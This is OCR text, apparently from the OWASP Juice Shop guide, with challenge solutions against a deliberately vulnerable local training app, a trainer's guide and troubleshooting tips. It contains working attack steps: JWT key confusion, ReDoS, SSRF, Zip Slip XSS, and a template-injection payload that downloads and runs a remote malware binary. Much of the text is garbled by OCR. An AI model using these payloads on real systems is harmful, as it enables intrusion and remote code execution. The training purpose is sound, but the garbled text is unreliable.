Command line client for ZeroMQ Base-85 encoding i 
6 
Getting Started version 
0.3.0 
Install the module with: 
open issues UL 
npm install -g 285-cli 0 o 
Documentation homepage epository 
github.com ® github 
Encoding 
last publish 
a year ago 


z85 --encode [-e] <value> 


Ð Test with Runkit 


Decoding 


z85 --decode [-d] <value> 


Specification 
Report a vulnerability 


Please refer to 32/285 - ZeroMQ Base-85 Encoding Algorithm. 


License 


Copyright (c) 2014-2018 Bjoern Kimminich Licensed under the MIT license. 


6. Check the official Juice Shop Twitter account 


https://twitter.com/owasp_juiceshop for a valid coupon code. At the time of 
this writing - January 2017 - the broadcasted coupon was _ n<Mibh.u)v 
promising a 50% discount. 


OWASP Juice Shop @owasp_juiceshop - 2. Jan 

Happy New Year, Juice Shoppers! ga We blast off 2017 with this 
incredible 50% off #coupon for our entire stock: n<Mibh.u)v (exp. 
31.01.2017) 
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7. Decrypting this code with z85 -d “n<mMibh.u)v" returns JAN17-5e 

8. Encrypt a code valid for the current month with 80% or more discount, e.g. 
z85 -e JAN17-8@ Which yields n<mibh.vey . 

9. Enter and redeem the generated code on the Your Basket page and 
Checkout to solve the challenge. 


Cloud computing solution path 


1. From February 2019 onward the monthly coupon tweets begin with a robot 
face emoji in square brackets. Maybe the Juice Shop sales team forgot to 
send coupons too often so that the process was automated at some point? 


OWASP Juice Shop eG=D y 
@owasp_juiceshop 


(2) All your favorite juices are now 10% off! 
Only with #coupon code: mNYS#iv#%t (use 
before 2019-02-28) 


11:53 - 20. Feb. 2019 


1 „Gefällt mir"-Angabe @ 


Qo jay O1 8 


è Twittere deine Antwort 





2. Some Internet research will bring you to the NPM module juicy-coupon-bot 
and its associated GitHub repository https://github.com/bkimminich/juicy- 
coupon-bot. @ As this is not part of the Juice Shop repo itself and it is publicly 
accessible, analyzing this repository is not considered cheating! 

3. Open the .travis.ym1 to see how the bot's CI/CD process is set up. You can 
also look at the job results and logs at https://travis-ci.org/bkimminich/juicy- 
coupon-bot. 

4. You will realize that there is a deploy step that is only executed when the 
build was triggered by a (monthly) cron job on Travis-Cl. This is probably the 
origin of the monthly tweets! But where does the bot get its coupon code 
from? 

5. Read the code of the juicy-coupon-bot carefully and optionally try to play with 
it locally after installing it via npm i -g juicy-coupon-bot . You can learn a few 
things that way: 

o Running juicy-coupon-bot locally will prepare the text for a tweet with a 
coupon code for the current month and with a discount between 10% 
and 40% and log it to your console. 

o The coupon code is actually retrieved via an AWS API call which returns 
valid coupons with different discounts and their expiration date as JSON, 


e.g. {"discountCodes": 
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{"10%" : "mNYS#iv#%t" , "20%" : "mNYS#iweeu", "30%": "mNYS#iwe3v", "40%" : "mNYS#iw@6w" }, 
“expiryDate":"2019-02-28"} 

6. You could collect this data for several months and basically fall back to the 
Pattern analysis solution path only with more recent coupons. 

7. For an easier and more satisfying victory over this challenge, take a look at 
the commit history of the GitHub repository 
https://github.com/bkimminich/juicy-coupon-bot, though. 

8. Going back in time a bit, you will learn that the coupon retrieval via AWS API 
backed by a Lambda function was not the original implementation. Commit 

fde29003 introduced the API call, replacing the previous programmatic 
creation of a coupon code. 








9. You now have learned the coupon format and that itis z835 encoded. You 
can now either manipulate your local clone of the "pre- fde2zee3 version" of 
the juicy-coupon-bot or fall back to the last part of the Reverse engineering 
solution path where you find and install zss5-c1i to conveniently create your 
own 80%+ coupon locally. 


Solve challenge #999 


1. Solve any other challenge 

2. Inspect the cookies in your browser to find a continuecode cookie 

3. The package.json.bak contains the library used for generating these continue 
codes: hashid 

4. Visit http://hashids.org/ to get some information about the mechanism 

5. Follow the link labeled check out the demo 
(http://codepen.io/ivanakimov/pen/oNmExm) 

6. The Juice Shop simply uses the example salt ( this is my salt ) and also the 
default character range 
( abcdefghijk1lmnopgrstuvwxyZABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 ) from that demo 
page. It just uses a minimum length of 6a instead of s for the resulting 
hash. 

7. Encoding the value 999 with the demo (see code below) gives you the hash 
result 690xrZ8aJEgxONZyWoz1Dw4BvxXmRGkM6Ae9M7k2rK63YpqQLPjn1b5V5LvDj 

8. Senda put request to the URL htip://localhost:3000/rest/continue- 
code/apply/69OxrZ8aJEgxONZyWoz1 Dw4BvXmRGkM6Ae9M7k2rK63YpqQ 
LPjnilb5V5LvDj to solve this challenge. 
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var hashids = new Hashids("this is my salt", 60, “abcdefghijklmnopgrstuvwxyzABCDEF¢ 


var id = hashids.encode(999); 
var numbers = hashids.decode(id); 


$("#input").text("["+numbers.join(", ")+"]"); 
$("H#output").text(id); 


Forge an almost properly RSA-signed JWT token 


1. Use your favorite forced directory browsing tool (or incredible guessing luck) 
to identify http://localhost:3000/encryptionkeys as having directory listing 
enabled. 

2. Download the application's public JWT key from 
http://localhost:3000/encryptionkeys/jwt.pub 


Q listing directory /encryptionke. X 





€ C a © 192.168.0.4:300 ior -va INO = 
~ I encryptionkeys / 
Name Size Modified 
jwt.pub 250 PM 3:16:35 1/23/2019 
premium.key 51 PM 3:16:35 1/23/2019 


3. Download and install the Burp Suite Community Edition 
4. In the BApp Store tab under the Extender tab within Burp Suite find and 
install the JSON Web Token Attacker extension (aka JOSEPH) 


[Dashboard | Target | Proxy | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Project options | User options | Logger++ | JOSEPH | Software Vulnerability Scanner 


Extensions | BApp Store | APIs | Options | 


BApp Store 

















The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp's capabilities. 


























| Name Installed | Rating Popularity |Last updated | Detail m 
| SCryption Handler Sree —T 14 Jul 2017 a| | JSON Web Token Attacker 

JSON Beautifier Aani 03 Oct 2017 F 

——} — 24 Jan 2017 JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper 
i A o 2 This extension helps to test applications that use JavaScript Object Signing and Encryption, 
reeves; 17 Dec 2018 including JSON Web Tokens. 

JSWS Parser Ainin 15 Feb 2017 Foaie 

JVM Property Editor were 24 Jan 2017 

Kerberos Authentication wit 30 Aug 2017 @ Recognition and marking 

Lair ween 25 Jan 2017 Pro extension © JWS/JWE editors 

Length Extension Attacks EA E AnA m 25 Jan 2017 

LightBulb WAF Auditing Aar- 22 Jan 2018 © (Semi-Automated attacks 

Log Requests to SQLite Ain 17 Dec 2018 © Bleichenbacher MMA 

Log Viewer Rrrr irn 20 Nov 2018 

RE EREN TARDE © Key Confusion (aka Algorithm Substitution) 

Manual Scan Issues wey 23 May 2017 Pro extension © Signature Exclusion 

Match/Replace Session wet 24 Aug 2017 

MessagePack rrr 20 Apr 2017 @ Base64url en-/decoder 

| 

MethOdMan wert 24 Jan 2017 NI © Easy extensibility of new attacks 

MindMap Exporter wet 25 Jan 2017 

Multi Session Replay wit 03 Oct 2017 Author, Dennis Doterng 

Multi-Browser Highlighting weet 14 Dec 2018 ae 303 

NGINX Alias Traversal watt 20 Nov 2018 ` 
| NMAP Parser writ 4 09 Jan 2017 Source: https //github.com/portswigger/json-web-token-attacker 
Notes Rar 01 Jul 2014 Updated: 08 Feb 2019 
| NTLM Challenge Decoder week 29 Jun 2018 

Rating: 5 Submit rati 
Office Open XML Editor Trittin 05 Jan 2018 miog EET yy (eitnatiatoal) 
OpenAP! Parser wwe 28 Jan 2019 Popularity: —_ 





5. Send any captured request that has an authorization: Bearer token to Burp's 
Repeater. 

6. Once in Repeater, click the JWS tab, then the Payload tab beneath and 
modify the email parameter to be rsa_lord@juice-sh.op . 
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Request 


Raw | Params | Headers | Hex | JWS 
Header | Payload | Base64(Signature) | Attacker 


{"status": "success", "data":{"id":14, "username": "", "email":" 
password" :"05a67lc66aefeal24cc08b76ea6d30bb", "isAdmin": false," 
0", "profileImage": "default.svg", "createdAt": "2019-02-12 20:10:17.490 
+00:00", "updatedAt": "2019-02-12 20:10:17.490 
+00:00"}, "iat": 1550002224, "exp": 1550020224} 












A 











© f (+ | (> J Type a search term 0 matches 
7. Next, click the Attacker tab, select Key Confusion, then click Load. 
8. Paste in the contents of the jwt.pub file without the ----- BEGIN RSA PUBLIC KEY- 
---- and ----- END RSA PUBLIC KEY----- lines. 
Go || Cancel | { < jv] >r Target: http://192.168.0.4:3000 7 Q) 
emus 





Raw | Params | Headers | Hex | JWS 
Header | Payload | Base64(Signature) | Attacker 


Available Attacks: 


| Key Confusion (7j | Load | 











Format of the public key: 
| PEM (String) ir 





MIGJAoGBAM3CosR73CBNcJsLvSES0NsFt6qN 1uziQ484gbOoulesleXHF bylzPQRozgEpSpiwhr 
6d2/cOCfZHEJ3mStVOkIxffMl7 ogjRMURnH/rmBjcETQ7 qzllSZQ/iptJ3p7 Gi78X5ZMhLNtDkUFUS 
WaGdiEb+SnC39wjErmJSfmGb7i1AgMBAAE=| 





Choose Payload: 
| Public key transformation 02 (0x02) iy) 








Update 


9. Click Update and then Go in the top left to send the modified request via Burp 
and solve this challenge! 


W Kudos to Tyler Rosonke for providing this solution. 


Like any review at least three times as the same user 


1. Liking a review normally results in a request to 
http://localhost:3000/rest/products/reviews which associates the email of the 
user with the review (identified by the JSON body of e.g. {id: 
"ZQdzyRCbw04ys3PcG"} ) and also increases its like counter by one. 

2. If you try to replay the same request you will get a 403 Forbidden HTTP status 
with {"error":"Not allowed"} in the response. 

3. Write a script that simultaneously executes three requests to 
http://localhost:3000/rest/products/reviews with body e.g. {id: 
"ZQdzyRCbwQ4ys3PcG"} and run it. 

4. If your 3 requests get handled asynchronously withing an (artificial) 150ms 
time window, you will cause a race condition and all will get through and each 
increase the like counter by one to a total of three! 
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5. 


Back in your browser you should now see the corresponding challenge 
marked as solved! 


Log in with the support team's original user 
credentials 


Solving this challenge requires KeePass 2.x installed on your computer. If you are 


using a non-Windows OS you can try using some unofficial port but there is no 


guarantee the file can be opened on those. 


1. 
2. 


Download and install KeePass 2.x from http://keepass.info 

Get the support team's KeePass database file from 
http://localhost:3000/ftp/incident-support.kdbx (note how this file is 
conveniently not blocked by the file type filter). 


. Inspecting main.js for information leakage (e.g. by searching for support ) 


will yield an interesting log statement that is printed when the support logs in 
with the wrong password: 


i.prototype.login = function() { 





. The logged text is in Romanian language: <!-- @echipa de suport: Secretul 
nostru comun este inca Caoimhe cu parola de master gol! --> 
. Running this through an online translator yields something like: support Team: 


Our secret is still common Caoimhe master password empty! 


. From master password empty you can derive, that the KeePass file is protected 


with only a key file instead of a password! 


. The key file must be something the support team has easy access to from 


everywhere - how else would they achieve 24/7 with expectedly high staff 
rotation? 


. The second important hint is the reference to caoimhe , which happens to be 


an Irish feminine given name. 


. Visit http://ocalhost:3000/#/about and cycle through the photos of all support 


staff that are displayed in the background feedback carousel. There is one 
woman with red hair, which is a (stereo-)typical attribute of Irish people - so 
maybe she actually is "Caoimhe"? 
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Customer Feedback 


Keep up the good work! (We te wiry) 


Follow us on Social Media 


W Twitter Ej Facebook © Slack Press Kit 





10. Download the photo http://localhost:3000/public/images/carousel/6.jpg and 
use it as a key file to unlock the KeePass database. 

11. Find the password for the support team user account in the prod entry of the 
KeePass file. 


@ incident-supportkdbx - KeePass 
File Edit View Tools Help 
panig- @-G#/A¢-1@ š 
|= incident-support | Title a | User Name Password URL 
4 B Recycle Bin Ê prod support@juice-sh.op makin juice-shop.herokuapp.com 
@ General fin {REF:U@LD3227A2867B6...  ****##8* juice-shop-staging.herokuapp.com 


te 
zm Mince Ê dev {REF:U@ED3227A2867B6... localhost:3000 
f Network 


4 Internet 
3 eMail 
Qh Homebanking 























| 0 of 3 selected Ready. 


12. Log in with support@juice-sh.op aS Email and J6avjTgopRs$?51+Zkq2AYnCE@RF§P 
as Password to beat this challenge. 
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Z Edit Entry 


You're editing an existing entry 











Entry | Advanced | Properties | Auto-Type | History 








Title: prod 


User name: support@juice-sh.op 





Password: J6aVjTgOpRs$?51+Zkq2AYnCE@RFSE| 
Quality: 
URL: juice-shop.herokuapp.com 


Notes: 











Expires: 03.01.2017 00:00:00 

















Z Tools 








Unlock Premium Challenge to access exclusive 
content 


1. Inspecting the HTML source of the corresponding row in the Score Board 
table reveals a HTML comment that is obviously encrypted: <!-- 
IvLuRfBIY1mStf9XFLEckIFngyd9LFV1JaaN/KRTPQPidTuJ7FR+D/nkWJUF+OxUF@7CeCeqYfxq+0IWad 
gNbqgYkUNvn//UbE7e95C+6e+7GtdpqJ 8mqm4WcPVUGIUxmGLTTAC2+G9UUFCD1DUjg==--> . 






ption mat-colum-description ng-ster-inserted” fxflex-"1 1 50%" fxhide.lt-sm fxshow role="gridcell” style="Flex: 11 







‘mat-cell cdk-column-des 
width: 50%; display: n 





a-gem fa-u-18" aria-hidden-"true” data-prefix-"far" data-icon-"gen" role-"img" xmlns-"http: //mm.n3.0ng/2860/svg” viesBox-"@ Ə 576 512" data-fa- 


-gom"></i 
g-inline--fa fa-gem fa-v-18" aria-hidden-"true" data-prefix-"fan” data-icon-"gen” role="img" xmlns="http: //mm.3.07g/2800/svg" viewBox-"@ Ə 576 512" data-fa- 





r fa-gem"></i> --> 
ine 


a fo-gem fa-u-18" aria-hidden-"true” data-prefix-"far" data-icon-"gen" role-"img" xmlns-"http://ww.w3.org/2000/svg" vienBox-"@ Ə 576 512" date-fa 







gem"></i> --> 
="svg-inline--fa fa-gem fa-w-18" aria-hidden="true” data-prefix-"far" data-icon-"gen" role-"img" xmlns-"http://mw.w3.org/2908/svg” viewBox-"@ Ə 575 512" data-fa- 








ria-hidden-"true" data-prefix-"far” data-icon-"g g" xmlns-"http://mm.w3.org/2000/svg" vi 





x=-"Ə Ə 576 512" data-fa- 
</t 


mae 
JFngyd9LFV1JaaN/KRTPOPİdTuUJ7FR+D/NkWJUF+8xUFƏ7CeCeqYfxq+0IVVa@gNbqgYkUNvn//UbE7e95C+6e+76tdpqJ8mqm4WcPvUGTUXMGLTTAC2+G9UUFCDIDUJE==--> 
P <a href="/redirect?tostittps: //blockchain, Info/address/1AbKfgvu9ps041NbLIskufO0TezWGSDRZn” target="_blank” >.</a> 

" to access exclusive content.” 








</div: 
/mat-cell> 


2. This is a cipher text that came out of an AES-encryption using AES256 in 
CBC mode. 

3. To get the key and the IV, you should run a Forced Directory Browsing attack 
against the application. You can use OWASP ZAP for this purpose. 


i. Of the word lists coming with OWASP ZAP only directory-list-2.3- 


big.txt and directory-list-lowercase-2.3-big.txt Contain the directory 
with the key file. 


ii. The search will uncover http://localhost:3000/encryptionkeys as a 
browsable directory 


245 


~ | encryptionkeys 


Name Size Modified 
jwt.pub 248 PM 2:34:01 1/1/2019 
premium.key 50 PM 2:34:01 1/1/2019 


iii, Open http://localhost:3000/encryptionkeys/premium.key to retrieve the 

AES encryption key £a99A61D92D2955B1E9285B855BF2AD42 and the IV 1337. 
4. In order to decrypt the cipher text, it is best to use openssl . 

o echo 
“IvLuRfBIY1mStf9XFLEckIFngyd9LFV1JaaN/KRTPQPidTuJ7FR+D/nkWIUF+OxUFO7CeCeqyYfxq+ 
OJVWaOgNbqgYkUNvn//UbE7e95C+6e+7GtdpqJ 8mqm4WcPVUGIUxmGLTTAC2+G9UUFCD1DUjg==" | 
openssl enc -d -aes-256-cbc -K EA99A61D92D2955B1E9285B55BF2AD42 -iv 
1337133713371337 -a -A 

o The plain text is: 
/this/page/is/hidden/behind/an/incredibly/high/paywall/that/could/only/be/unl 
ocked/by/sending/1btc/to/us 

5. Visit 
http://localhost:3000/this/page/is/hidden/behind/an/incredibly/high/paywall/tha 
t/could/only/be/unlocked/by/sending/1btc/to/us to solve this challenge and 
marvel at the premium VR wallpaper! (Requires dedicated hardware to be 
viewed in all its glory.) 


Perform a Remote Code Execution that occupies the 
server for a while without using infinite loops 


1. Follow steps 1-7 of the challenge Perform a Remote Code Execution that 
would keep a less hardened application busy forever. 

2. As Request Body put in {"“orderLinesData”: 
"/((at+)+)b/.test ( 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')"} - Which will trigger a very 
costly Regular Expression test once executed. 

3. Submit the request by clicking Execute. 

4. The server should eventually respond with a 503 status and an error stating 
Sorry, we are temporarily not available! Please try again later. after roughly 2 
seconds. This is due to a defined timeout so you do not really DoS your Juice 
Shop server. 


Request a hidden resource on server through server 


1. Solve Infect the server with "juicy malware" by abusing arbitrary command 
execution at least to the point where you have access to the "juicy malware" 
executables. 

2. Similar to that SSTi challenge, the vulnerable place for this one is found on 
the http://localhost:3000/profile page. 

3. The only promising input field for an SSRF attack is the Gravatar URL. Open 
your browser's DevTools and watch the Network tab. 

4. Type any URL (e.g. https://placekitten.com/100/100) into Gravatr URL and 
click Link Gravatar. You will realize a request http://juice-shop- 
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10. 


11. 


staging.herokuapp.com/profile/image/url with the chosen 
https://placekitten.com/100/100 as paramter imageur1 . 


. You will find no HTTP request to https://placekitten.com/100/100 going out 


from your browser, though. As the image was retrieved and associated with 


your profile, it must have been downloaded by the Juice Shop server. 








. To solve this challenge, you need to find a secret URL hidden inside the 


"juicy malware" and simulate a self-targeted SSRF attack with it. 


. Use your favorite decompiler(s) to see what is going on inside the malware 


program... 


. ...or execute the malware while tunneling all its traffic through a proxy. 
. Either way you should be able to identify the URL being called by it is 


http://localhost:3000/solve/challenges/server-side? 
key=tRy_H4rd3r_nOthIng_iS_ImpOssibl3 

Visiting that URL directly will not do anything, as it needs to be called through 
the Gravatar Link field that was presumably vulnerable to SSRF 

Paste the URL in and click Link Gravatar to get the expected challenge 





solved notification! 


Infect the server with juicy malware by abusing 
arbitrary command execution 


1. 


Perform the totally obvious Google search for juicy malware to find 
https://github.com/J12934/juicy-malware 


. Alternatively you also find three .ur1 files with direct links in 


http://localhost:3000/ftp/quarantine but you'll probably need to understand 
how to solve any of Access a developer's forgotten backup file, Access a 
salesman's forgotten backup file or Access a misplaced SIEM signature file 
first. 


. Your goal is to use RCE to make the server download and execute the 


malware version for the server OS, so on Linux you might want to run 
something like wget -O malware https://github.com/J12934/juicy- 
malware/blob/master/juicy_malware_linux_64?raw=true && chmod +x malware && 


./malware 


. You probably realized by now that http://localhost:3000/profile is not an 


Angular page? This page is written using Pug which happens to be a 
Template engine and therefore perfectly suited for SSTi mischief. 
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5. Set your Username to 1+1 and click Set Username. Your username will be 
just shown as 1+1 under the profile picture. 

6. Trying template injection into Pug set Username to #{1+1} and click Set 
Username. Your username will now be shown as 2 under the profile picture! 

7. Craft a payload that will abuse the lack of encapsulation of JavaScript's 
global.process Object to dynamically load a library that will allow you to 
spawn a process on the server that will then download and execute the 
malware. 

8. The payload might look like # 
{global.process.mainModule.require('child_process').exec('wget -O malware 
https: //github.com/J12934/juicy-malware/blob/master/juicy_malware_linux_64?raw=true 
&& chmod +x malware && ./malware')} . Submit this as Username and (on a Linux 
server) the challenge should be marked as solved 


@ Remember that you need to use the right malware file for your server's 
operation system and also their synonym command for wget . 


Embed an XSS payload into our promo video 


r promo video 1. The author tweeted about a new promotion video from his 
personal account, openly spoilering the URL <http://juice-shop- 
staging.herokuapp. 


<http://juice-shop-staging.herokuapp.com/promotion> 
![Tweet promoting a new in-app promotion video] (img/tweet 


pro motion.png) 2. Visit http://localhost:3000/promotion to watch the video. You 
will notice that it comes with subtitles enabl 


notice that it comes with subtitles enabled by default. 
![In-app promotion video] (img/p 


omo video.png) 3. Right-click and select _ View Source on the page to learn that it 
loads its video from http://localhost:3000/video and that the subtitles are directly 
embedded in th e p age itself. 4. Inspecting the response for 
http://localhost:3000/video in the Network tab of your DevTools shows an 
interesting header content-Location: /assets/public/videos/JuiceS hop Jingle.mp4 5. 
Trying to access the video directly at 
http://localhost:3000/assets/public/videos/JuiceShopJingle.mp4 works fine. 6. 
Getting a directory listing for http://localhost:3000/assets/public/videos does not 
work unf ortunately. 7. Knowing that the subtitles are in WebVTT format (from 
step 3) a lucky guess would be that a corresponding .vtt file is available alongs 
ide the video. 8. Accessing 
http://localhost:3000/assets/public/videos/JuiceShopJingle.vtt proves this assum 
pti on correct. 9. As the subtitles are not loaded separately by the client, they must 
be embedded on the server side. If this embedding happens without proper 
safeguards, an XSS attack would be possible if the subtitles files could b e ov 
erwritten. 10. The prescribed XSS payload also hints clearly at the intended attack 
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against the subtitles, which are themselves enclosed in a <script> tag, which the 
payload will try to close prematurely with its starting < /script> . 11. To 
successfully overwrite the file, the Zip Slip vulnerability behind the Overwrite the 
Legal Information file challeng e ca n be used. 12. The blind part of this challenge 
is the actual file location in the server file system. Trying to create a Zip file with 
any path trying to traverse into ../../assets/public/videos/ will fail. Notice that 
../../ Was sufficient to get to the root folder in Overwrite the Legal Information 
file. 13. This likely means that there is a deeper directory structure in which ass 
ets/ resides. 14. This actual directory structure on the server is created by the 
AngularCLI tool when it compiles the application and looks as follows: 
frontend/dist/fron tend /assets/ . 15. Prepare a ZIP file with a juiceshopJingle.vtt 
inside that contains the prescribed payload of </script><script>alert(*xss°) 
</script> With zip exploit.zip 
../../frontend/dist/frontend/assets/public/video/JuiceShopJingle.vtt ( on Linux). 16. 
Upload the ZIP file on <hittp://localhost:300 0/#/ complain>. 17. The challenge 
notification will not trigger immediately, as it requires you to actually execute the 
payload by visiting <http://localhost:3000/pro moti on> again. 18. You will see the 
alert box and once you go Back the challenge solution should trigge 


= 


. https://en.wikipedia.org/wiki/ROT13 © 


N 


. http://hakipedia.com/index.php/Poison_Null_Byte -e 


wo 


. http://www.kli.org/about-klingon/klingon-history + 


4 https://en.wikipedia.org/wiki/List_of_postal_codes_in_Germany © 





5 https://en.wikipedia.org/wiki/Leet - 


O 


. https://en.wikipedia.org/wiki/Billion_laughs_attack - 
7 


https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_( 
OTG-INPVAL-004) e 


8 https://snyk.io/research/zip-slip-vulnerability < 
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Trainer's guide 


Co-authored by Timo Pagel 


Instances 


Make sure all participants have their own running Juice Shop instance to work 
with. While attempting challenges like RCE or XXE students might occasionally 
take down their server and would severely impact other participants if they shared 
an instance. 


There are multiple Run Options which you can choose from. It is perfectly fine to 
run multiple docker containers on one host. They do not effect each other. 


Customization 


Especially in awareness trainings for management you might want to create a 
higher immersion by making the Juice Shop look like an application in the 
corporate design of the participants' own company. Juice Shop offers various 
customization options to achieve this. 


Several custom configurations already come packaged with the Juice Shop 
source code, the two most sophisticated ones being 7 Minute Security and 
Mozilla. 


In addition, you might want to disable all challenge notifications during awareness 
trainings to avoid distraction. The Quiet configuration demonstrates the necessary 
options to achieve this. 


OWASP Juice Shop 


CLE LLE 


Apple Juice Banana Juice 
KOD (1000mi) 


1.990 aa 1.990 





For a really sophisticated and immersive demo consider performing some 
Additional Browser tweaks. These will let you use OAuth2 login via Google and 
cast the illusion that coupon codes were actually tweeted by your customer's 
company. 


Classroom hints 
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In a class room setup you have to find a way to distribute the URL of each 
instance to the participants. For small groups, it is probably fine to just spin up a 
number of containers and tell all participants which URL they have to use. An 
example to spin up 10 Docker containers on a UNIX based system is to run 


for i in {10..19}; do docker run -d -p 40$1:300@ bkimminich/juice-shop; done 


If you want to track progress centrally during the training, you might want to host a 
central CTF server where participants can post the challenges they already 
solved. You might consider turning off public visibility of the leader board on the 
CTF server unless you want to encourage the students to hack very competitively. 


Hosting individual instances for multiple users 


A solution to host and manage individual Juice Shop instances for multiple users 
is JuicyCTF. JuicyCTF is a Kubernetes based system to start up the required 
Juice Shop instances on demand. It will also clean up unused instances after a 
configured period of inactivity. 


JuicyCTF comes with a custom-built load balancer. It allows every participant to 
use the same URL, but their traffic will always be sent to their own personal 
instance. 


The JuicyCTF repository contains multiple guides on how to set up the system on 
different cloud provider environments. 


Existing trainings 


One existing training which uses the Juice Shop for example is Timo Pagel's 
University Module. The structure mostly is as follows: 


1. Introduce a topic (e.g. SQL Injection) 
2. Let the participants try it out in the Juice Shop 
3. Show mitigation/counter measures 


The 2nd semester web attack chapters of Bjorn Kimminich's IT Security Lecture 
follow a similar pattern of 


1. Introduction 

2. Timeboxed exercise 

3. Demonstration of the hack (for all who did not finish the exercise in time) 
4. Explaining mitigation and prevention 


You can find more links to existing material in the Lectures and Trainings section 
of the project references on on GitHub. 


Challenges for demos 
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The following challenges are well suited for live demonstrations in trainings or 


talks. You should always begin by showing how to find the Score Board ( * ) so 


you can then pick any of the challenge below to further demonstrate certain 


categories of vulnerabilities. 


Description 


DOM XSS 


Confidential 
Document 


Login Admin 


Reflected 
XSS 


Classic 
Stored XSS 


Privacy 
Policy 


Privacy 


Policy 
Inspection 


Admin 
Section 


View Basket 


Easter Egg 


Nested 
Easter Egg 


Forgotten 
Developer 
Backup 


Forged 
Coupon 


Category 


XSS 


Sensitive 
Data 
Exposure 


Injection 


XSS 


XSS 


Miscellaneous 


Security 
through 
Obscurity 


Broken 
Access 
Control 


Broken 
Access 
Control 


Broken 
Access 
Control 


Cryptographic 
Issues 


Sensitive 
Data 
Exposure 


Cryptographic 
Issues 


XSS demo 


Difficulty 


* 


pod 


Kak 


pend 


pend 


oe 84 


, oe 8:4 


DO oad 


Kan te 
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Time 
for 
demo 


XX 


XX 


XX 


XXX 


XXX 


XXX 


XXX 


Dependencie 


None 


None 


None 


Log in as any 


Log in as any 


Log in as any 


Privacy Policy 


Login Admin ¢ 
Registration 


Log in with tw: 
different users 


Explain Poiso. 
Byte 


Easter Egg 


Explain Poiso. 
Byte 


Forgotten Dev 
Backup and : 
installed or Fc 
Sales Backup 
tracing coupo! 
Twitter/Reddit 
https://travis- 
ci.org/bkimmir 
coupon-bot 


A particularly impressive showcase of XSS site-defacement combined with a 
keylogger is provided explicitly for live demos and awareness trainings: 


. Install Docker. 

. Run git clone https://github.com/wurstbrot/shake-logger . 

. Run cd shake-logger and then docker-compose up . 

. Turn on your speakers and make sure your browser is allowed to play sound. 
. Open this link to launch the XSS demo (#)). 

. Use the application normally, e.g. doing a search and logging in with some 


Oak WN = 


user. 
7. In a new tab go to hitp://localhost:8080/logger.php to see that all user input 
was transmitted to a third-party server. 
8. Show the Network tab of the browser window with Juice Shop to see the 
requests that are sent to the logger.php script. 
9. Reload the Juice Shop with Fs and use the application a bit more. 
10. You will see that no more logging takes place as XSS payload was removed 
during the reload. 


There is also a video recording available on YouTube: https://youtu.be/Msi52Kicb- 
w. This is a good fallback in case the Docker-based setup does not work for you. 
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Troubleshooting 


If (and only if) none of the below hints could help you resolve your issue, please 
post your problem on our official Gitter Chat. If you are sure to have found a bug 
in the Juice Shop itself please open a GitHub issue. 


Node.js / NPM 


e After changing to a different Node.js version it is a good idea to delete 
npm_modules and re-install all dependencies from scratch with npm install 

e If during npm install the sqlite3 Or libxmljs2 binaries cannot be 
downloaded for your system, the setup falls back to building from source with 
node-gyp . Check the node-gyp installation instructions for additional tools you 
might need to install (e.g. Python 2.7, GCC, Visual C++ Build Tools etc.) 

e If npm install fails on Ubuntu with the pre-installed Node.js please install the 
latest release of Node.js 12.x from scratch and try again. 

e If npm install runs into a Unexpected end of JSON input error you might need 
to clean your NPM cache with npm cache clean --force and then try again 


Docker 


e |f using Docker Toolbox on Windows make sure that you also enable port 
forwarding from Host 127.0.0.1:3000 to @.0.0.0:30ee for TCP for the default 
VM in VirtualBox. 


Vagrant 


e Using the Vagrant script (on Windows) might not work while your virus 
scanner is running. This problem was experienced at least with F-Secure 
Internet Security. 


OAuth 


e |f you are missing the Login with Google button, you are running OWASP 
Juice Shop under an unrecognized URL. You can still solve the OAuth 
related challenge! If you want to manually make the OAuth integration work 
to get the full user experience, follow these steps: 

1. Add your server URL to variable authorizedRedirectuRIs in 
/frontend/src/app/login/login.component.ts using your URL for both the 
property name and value. 

2. Setup your own OAuth binding in Google 
https://console.developers.google.com/apis/library by clicking 
Credentials and afterwards Create credentials. 
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3. Update the clienttd variable in login.component.ts to use your new 
OAuth client id from Google. 

4. Re-deploy your server. You will now have the option to login with Google 
on the login page. 


One thing to note: Make sure that you setup the redirect_uri to match 
your app's URL. If you for some reason have to modify the redirect_uri , 
this gets cached on Google's end and takes longer than you'll want to wait 


to reset. 


Miscellaneous 


e You may find it easier to find vulnerabilities using a pen test tool. We strongly 
recommend Zed Attack Proxy which is open source and very powerful, yet 
beginner friendly. 
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